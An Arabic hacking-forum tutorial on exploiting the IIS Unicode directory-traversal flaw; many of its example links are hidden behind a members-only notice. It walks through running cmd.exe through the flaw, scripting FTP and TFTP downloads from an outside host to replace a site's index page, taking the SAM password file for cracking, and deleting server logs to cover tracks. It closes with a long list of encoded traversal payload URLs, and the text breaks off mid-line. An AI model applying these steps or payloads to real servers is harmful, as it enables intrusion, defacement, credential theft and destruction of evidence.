لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .
كيفية ايجاد هذه الثغرات
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمتخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
الاوامر المستخدمة بواسطة ملف
- امر لانشاء دليل جديد .
- امر لالغاء دليل .
- امر النسخ .
- امر النقل .
- امر الحذف .
- امر تغيير اسماء الملفات .
- امر لرؤية محتويات الملف .
- امر الكتابة داخل أي ملف .
- امر لسحب أي ملف .
وهي حسب الامثلة التالية :
امر انشاء دليل جديد:-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
امر الغاء دليل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
ملاجظة : لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات
الامر المستخدم للنسخ :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للنقل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للحذف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لتغيير مسمى الملفات :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لرؤية محتويات الملف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للكتابة داخل أي ملف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لعملية سحب أي ملف :-
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- طريقة تطبيق هذه الثغرات
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// +c
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .[/
في حالة اكتشاف موقع يعاني من مشكلة اليوني كود ولنفترض انه كان على هذه الثغرة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// بحيث يكون الامر بالشكل التالي :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////@Hotmail.com+>+c:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// ndex.htm
طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
*اولا انشاء صفحة باسم test.shtml
*تكون هذه الصفحة داخل مجلد ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
*كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
*الان يتم طلب الصفحة من خلال المتصفح ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
*الان سوف تظهر لك الصفحة .
*الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied
اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////+>>+c:\winnt\mspft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////+>>+c:\winnt\mspft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// pft.ppl
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- User Anonymous
- ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
طريقة كشف باسورد الادمينستريتور
نحتاج الى وجود برنامجين وهي ( Microsoft Access – L0phtCrack ) لزوم تنفيذ بعض الخطوات التالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack .
اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro
l\Lsa\SYSTEM32\PASSFILT.DLL
اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات والان يتم الاتصال بها من خلال برنامج الـ Access .
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامجTFTP /]
1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// m
tftp.exe :
البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i":
بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 :
رقم الايبي الخاص بك
GET :
الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm :
اسم الملف بجهازك
\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// :
اسم الدليل في السيرفر
index.htm :
اسم الملف على السيرفر
- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
--------------------------------------------------------------------------------
B-H18-10-2003, 13:55
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../%77%69%6E%6E%74/s%79s%74%65%6D%33%32/%63%6D%64%2E%65%78%65?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%9u%dg%7g%9u/%dg%7g%9u%dg%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%ae%dg%7g%ae/%dg%7g%ae%dg%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%qe%dg%7g%qe/%dg%7g%qe%dg%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%9u%dg%80%9u/%dg%80%9u%dg%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%qe/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%qe%e0%80%qe/%e0%80%qe%e0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%qe%u0%80%qe/%u0%80%qe%u0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%bg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%e/.%
--------------------------------------------------------------------------------